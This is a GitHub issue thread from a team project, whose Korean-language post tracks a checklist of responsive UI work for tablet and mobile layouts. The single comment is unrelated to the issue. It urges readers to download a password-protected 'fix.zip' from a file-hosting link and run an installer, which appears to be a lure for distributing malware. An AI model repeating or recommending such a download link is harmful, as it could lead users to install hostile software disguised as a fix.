### ISSUE TITLE
[YuKyoung] 반응형 UI 구현

### ISSUE THREAD

**Issue by codingaring** [Sprint-Part3-Team14/TimeSaver#50]
## 기능명
타블렛, 모바일 반응형 UI 구현

## 구현 목표
- [x] SidePage 레이아웃 
  - [x] EditCard
  - [x] CreateCard
  - [x] CardDetail
- [x] ModalBase 레이아웃
- [x] 대시보드
  - [x] 컬럼
  - [x] 카드
  - [x] 기타 버튼

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
